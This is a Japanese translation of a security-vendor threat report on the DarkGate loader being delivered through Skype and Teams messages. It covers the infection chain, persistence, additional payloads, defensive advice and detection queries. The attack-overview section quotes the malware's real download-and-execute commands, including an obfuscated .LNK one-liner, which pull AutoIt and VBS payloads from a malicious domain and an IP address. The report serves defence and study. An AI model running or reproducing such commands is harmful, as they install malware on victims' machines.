サイバー脅威
SkypeやTeamsを介してマルウェア「DarkGate」を企業組織に配布する攻撃活動について解説
メッセージアプリ「Skype」や「Teams」を介してローダ型マルウェア「DarkGate」を標的企業に送り込む攻撃キャンペーンについて解説します。また、ひとたびDarkGateに感染すると、追加のペイロードが配備される挙動も確認されました。
2023年7月から9月にかけてマルウェア「DarkGate」による攻撃キャンペーンが活発化し、VBAの不正なローダをメッセージアプリ経由で配布する手口が確認されました。本VBAスクリプトは、Windows操作の自動化アプリ「AutoIt」や、DarkGateの不正なコードを含むAutoIt用スクリプト(トレンドマイクロではi以下として検知)をダウンロードし、実行しました。
攻撃者がメッセージアプリのアカウントを侵害した手法については現状不明ですが、アンダーグラウンドのフォーラムや親企業に対する過去の攻撃で流出済みの認証情報が利用されたと推測されます。
ここ2、3年の間、DarkGateによる活発な動きは見られませんでした。しかし今年に入ってからは、セキュリティ企業「Truesec」や「MalwareBytes」の報告からうかがえるように、複数回に渡る攻撃活動が確認されています。DarkGateの攻撃が検知された地域を分析したところ、アメリカ圏が最も多く、アジアや中東、アフリカ圏がそれに続く形となりました。
経緯
DarkGateが初めて報告されたのは2017年のことであり、商用のローダ型マルウェアとして分類されています。2023年5月になると、さまざまなバージョンがロシア語フォーラム「eCrime」上で宣伝されるようになりました。それ以降、本マルウェアを初期侵入に利用した事例が多発しています。
DarkGateは、下記をはじめとするさまざまな機能を備えています。
- 探索用コマンドの実行(フォルダ探索など)
- 自己アップデート、自己管理
- リモートアクセス用ソフトウェアの実装:RDP(Remote Desktop Protocol)、hVNC(hidden Virtual Network)、AnyDeskなど
- 暗号資産マイニングの有効化(開始、停止、設定)
- キーロギング(キーボード入力を盗み取る)
- ブラウザ情報の窃取
- 権限昇格
DarkGateは、不正な機能を配布、実行する際に、Windows操作の自動化ツール「AutoIt」を利用します。AutoIt自体は正規なツールですが、マルウェアの難読化や防御回避の用途でも頻繁に不正利用されてきました。一方、IcedID、Emotet、Qakbotといった主要なローダ型マルウェアにAutoItが利用されたという報告は確認されていません。そのため、セキュリティチームや解析チームの視点から見ると、AutoItが利用されていることは、対応する攻撃キャンペーンを特定する際の有力な判断材料となります。
今回発見されたDarkGateの最新版を、同じくAutoItを不正利用する2018年の検体と比較しました。その結果、感染チェーンはほとんど変わっていないものの、初期ステージャやコマンドラインの難読化に関わる手続きに一定の差異が確認されました。
攻撃の概要
本事例の攻撃者は、Skype上で被害者に不正なVBAスクリプトを送り付け、これを実行するように誘導しました。誘導の手口として、被害者が属する組織と提携関係にある別組織との信頼関係を利用しました。例えば、被害者のSkypeアカウントに不正アクセスし、当該の2組織間で行われるメッセージスレッドの内容を盗み取り、その文脈に合わせて信ぴょう性のあるファイル名を考案しました。
被害者側では、不正なVBSスクリプトの添付されたメッセージを、侵害済みのSkypeアカウントから受信しました。添付ファイルの名前を下記に示します。
<攻撃者が考案したファイル名.pdf> <空白文字列> www.skype[.]vbs
上記の「空白文字列」は、当該ファイルの実形式である「.vbs」を隠し、「.PDF」文書であると被害者に信じ込ませる手段です。本事例の場合、送信者アカウントは受信者から見て既知の人物であり、外部サプライヤーとして信頼関係にある組織に所属していました。
被害者がVBAスクリプトを起動すると、はじめにまず「<ランダム文字列>」の名前で新規フォルダが作成され、次に正規なダウンロード用ツール「curl.exe」のコピーが同じ名前「<ランダム文字列>.exe」で作成されます。さらに、コピー後のcurlを介して外部サーバからAutoIt3の実行ファイルと、それに対応する「.AU3」形式のスクリプトファイルがダウンロードされます。
「Trend Vision One™」の解析により、VBAスクリプトがWindowsネイティブの「wscript.exe」経由で実行されたことが検知されました。さらに本VBAスクリプトにより、フォルダ「<ランダム文字列>」とcurl.exeのコピーファイル「<ランダム文字列>.exe」が作成されました。
Trend Vision OneのRCA解析結果として、まずコマンド「cmd.exe」によってCurlが起動されました。次にCurlによって、正規なAutoItのアプリと、それに対応する不正なスクリプト「fIKXNA.au3(au3:AutoItバージョン3のスクリプトを表す)」がリモートサーバからダウンロードされました。一連の処理で使用されたコマンドを下記に示します。
C:\Windows\System32\cmd.exe" /c mkdir c:\zohn & cd /d c:\zohn & copy
C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3
以上の他、Skypeの代わりにMicrosoft Teamsによって不正なリンクを送信した事例も確認されました。本事例において、被害システム側では外部ユーザからのメッセージを受け取れるような設定がされていたため、結果としてスパム攻撃の有効な標的となりました。このDarkGateと類似した手口については、2023年9月初頭にセキュリティ企業「Truesec」から報告されています。Skypeの事例では「VBS」がPDF文書に偽装されるのに対し、Teamsの事例では「.LNK」がPDFに偽装される他、組織的に無関係な未知の人物からメッセージが届く点など、細かな差異が見られます。
さらに複雑な配布形態として、攻撃者のSharePointサイトから圧縮アーカイブを配信し、そのアーカイブに含まれる「.LNK」ファイルを介してVBAスクリプトをダウンロードさせる三重構造の手口も確認されました。この場合、被害者はSharePointのサイトにアクセスし、圧縮アーカイブ「Significant company changes September.zip」をダウンロードするように誘導されます。
この.ZIPファイルには下記の.LNKファイルが含まれ、PDF文書に偽装されています。
- Company_Transformations.pdf.lnk
- Revamped_Organizational_Structure.pdf.lnk
- Position_Guidelines.pdf.lnk
- Fresh_Mission_and_Core_Values.pdf.lnk
- Employees_Affected_by_Transition.pdf.lnk
.LNKファイルの内容は、下記のように複数のコマンドを並べたものであり、先頭のコマンドから実行を開始し、失敗した場合にのみ次のコマンドに進むように動作します。
C:\Windows\System32\cmd.exe" /c hm3 || EChO hm3 & PIN"G" hm3 || cURl h"t"t"p":"//"1"85.39".1"8".17"0"/m"/d"2"J" -o
C:\Users\<ユーザ名>\AppData\Local\Temp\hm3.vbs & PIN"G" -n 4 hm3 || c"sCR"i"Pt"
C:\Users\<ユーザ名>\AppData\Local\Temp\hm3.vbs & e"XI"t 'HlnLEG=OcCQmmcm
コマンドが成功すると、被害端末上でローダ用のVBAスクリプト(hm3.vbs)がダウンロード、実行されます。このhm3.vbsは、フォルダ「System32」配下にある「curl.exe」を「<ランダム文字列>.exe」の名前で複製します。次に、複製後のcurlを用いて「Autoit3.exe」とそれに対応する不正なDarkGateのコードをダウンロードします。
DarkGateのAU3スクリプトを分析
先述の通りVBAスクリプトは、正規なAutoItのコピーと、AutoIt用の不正なスクリプトファイル(AU3形式)をダウンロードします。続いて下記のチェックを行い、条件の全てを満たさない場合は、AU3ファイルからDarkGateのメイン機能を読み込むことなく処理を終了します。
- フォルダ「%Program Files%」が存在すること
- スキャン対象のユーザ名が「SYSTEM」ではないこと
上記の環境チェックが完了すると、本プログラムは「.au3」の拡張子を持つファイルを検索し、これを復号した上で、DarkGateのペイロードを実行します。「.AU3」のファイルを読み込めなかった場合は、エラー用のメッセージボックスを表示して処理を終了します。
AU3ファイルのメイン機能が稼働すると、フォルダ「C:\Program Files (x86)」配下にあるプロセスを起動し、不正な処理の隠れ蓑として利用します。該当のプロセスとして、以下のものなどが挙げられます。
iexplore.exe
GoogleUpdateBroker.exe
Dell.D3.WinSvc.UILauncher.exe
AU3はこれらのプロセス内にDarkGateのペイロードをインジェクト(埋め込む)し、メモリ内で実行します。
本マルウェアは、下記に示すWindowsのユーザ・スタートアップ用フォルダにランダム名のLNKファイルを作成します。これにより、当該ファイルがシステム起動時に自動実行されるようになり、永続化が図られます。
<C:\Users\<ユーザ名>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<ランダム名>.lnk>
さらに本マルウェアは、フォルダ「Program Data」の配下にランダムな7文字のフォルダを新規作成し、ログ情報や設定情報の記録先として利用します。設定ファイルの内容を抽出する上では、「Telekom Security」によるツールが有用であり、DarkGateのペイロードや処理の解析に役立ちます。
インストール後の活動
DarkGateのインストール後に稼働するマルウェアを解析したところ、追加のペイロードをダウンロードする挙動が確認されました。ペイロードの作成場所は以下のフォルダなどであり、偽装を意識したものと考えらます。
C:/Intel/
%appdata%/Adobe/
ペイロード用ファイルは、DarkGateやRemcosの亜種として検知されました。攻撃者は、これらを用いて感染端末における足場の強化を図ったものと考えられます。下記に、調査時に発見されたペイロード用ファイルの名前を挙げます。
- Folkevognsrugbrd.exe
- logbackup_0.exe
- sdvbs.exe
- Vaabenstyringssystem.exe
- Sdvaners.exe
- Dropper.exe
まとめおよび推奨事項
本事例では、攻撃者が目的を達成する前にその活動を検知し、隔離することに成功しました。しかし、攻撃者がDarkGateの宣伝や貸与に軸足を移している実態を踏まえると、その目的は宣伝先や提携先グループに応じて変化すると考えられます。サイバー犯罪者はDarkGateのペイロードを利用することで、さまざまなマルウェアを標的環境にインストールさせることが可能です。該当のマルウェアとして、情報窃取ツールやランサムウェア、リモート管理機能を不正利用するツール、暗号資産マイナーなどが挙げられます。
今回の主要な事例において、被害者はサードパーティ・サプライヤーとのやり取りのために、アプリ「Skype」を正規な方法で利用していました。攻撃者はそこに付け入ることで、被害者を容易に欺き、不正なファイルを実行するように誘導しました。しかし攻撃者にとって、メッセージの受信者は足場を築くための一時的な標的でしかなく、最終的な目的は環境全体を侵害することにあります。また、DarkGateを購入または貸与したグループに応じて、脅威の内容はランサムウェアから暗号資産マイニングに至るまで多岐に渡って変化します。トレンドマイクロのテレメトリ情報では、DarkGateを引き金としてランサウェアグループ「Black Basta」に関連するツール類が発見されています。
外部からのメッセージを禁止していない、または信頼済みアカウントの不正利用を監視していない限り、いかなるメッセージアプリも、本稿で述べた初期侵入の手段として利用される可能性があります。企業や組織において新しいアプリケーションを導入する際は、必ずセキュリティ対策について検討を行い、アタックサーフェス(攻撃対象領域)を可能な限り狭めることが推奨されます。本事例の場合であれば、メッセージアプリの導入に際して外部ドメインをブロックする、添付ファイルを制御する、可能であればスキャンを行うなどの対応が挙げられます。また、認証情報が侵害される事態に備え、多要素認証(MFA:Multifactor Authentication)を導入することも、各種アプリ(メッセージアプリも含む)の安全性を高める上で有用です。一連の対策が、本稿で述べた攻撃の抑止に繋がると考えられます。
アプリケーション許可リストも有効な防御手段の1つであり、ポリシーに準じてホスト内で起動できるアプリケーションを制限できます。例えば、本事例で挙げたアプリケーション「AutoIt」がエンドユーザ端末で必要とされることは稀なため、許可リストの設定によって当該アプリを禁止することが、対策の1つとして挙げられます。
今回確認された侵入経路は新しいものではありませんが、その内容を踏まえると、感染が進行する前の早い段階で攻撃を食い止めることが特に重要であると考えられます。企業や組織では、規模によらず、従業員に対してユーザ・セキュリティに関する注意喚起や教育を定期的に実施することが推奨されます。また、その効果を高める上では、各従業員が最新の脅威を理解し、適切に対処できるようにするという目的に沿った教育内容を組むことが重要です。メールやメッセージアプリのスレッド上でなりすましを行う手口は、画面上の送信者を常にその人本人と認識し、信頼し切ってしまう傾向を突いたものです。従って、こうした「信頼」を疑い、警戒心を維持するための教育を実施することが、セキュリティの向上に繋がると考えられます。
本事例に見られる攻撃手法に対処する上では、「Trend Service One™」に含まれる「Trend Micro™ Managed XDR」の高度な常時監視、防御、検知機能が有効です。変化し続けるTTPs(Tactics:戦略、Techniques:テクニック、Procedures:プロシージャ)に柔軟に対処するため、トレンドマイクロのセキュリティ解析チームが迅速に脅威を検知してこれを隔離し、攻撃活動を阻止します。また、企業や組織では、さまざまなセキュリティ階層にまたがった検知、応答機能を備えた「Trend Vision One™」もご活用いただけます。本ソリューションでは、感染の起点となりうるエンドポイントを、完全にクリーンな状態になるか、調査が完了する時まで隔離することが可能です。
Trend Vision Oneをご利用のお客様は、DarkGateを検索するために下記クエリをご使用いただけます。
processFilePath:wscript.exe AND objectFilePath:cmd.exe AND objectCmd:(au3 OR autoit3.exe OR curl) AND eventSubId: 2
本攻撃手法では、「cmd.exe」によって「curl.exe」が実行され、これによって正規なアプリ「AutoIt」と、それに対応する不正な「.au3(AutoIt Version 3のスクリプト形式)」ファイルがダウンロードされます。上記クエリの「eventSubId: 2」は、「TELEMETRY_PROCESS_CREATE(テレメトリ・プロセス作成)」を指します。
parentFilePath:cmd.exe AND processFilePath:curl.exe AND processCmd:*http* AND objectFilePath:*vbs AND eventSubId:101
本クエリは、curlによるVBスクリプトのダウロードをチェックします。「eventSubId: 101」は「TELEMETRY_FILE_CREATE(テレメトリ・ファイル作成)」を指します。
侵入の痕跡(Indicators of Compromise、IoC)
侵入の痕跡(IoC)について、こちらで確認してください。
参考記事:
DarkGate Opens Organizations for Attack via Skype, Teams
By: Trent Bessell, Ryan Maglaque, Aira Marcelo, Jack Walsh, David Walsh
翻訳:清水 浩平(Core Technology Marketing, Trend Micro™ Research)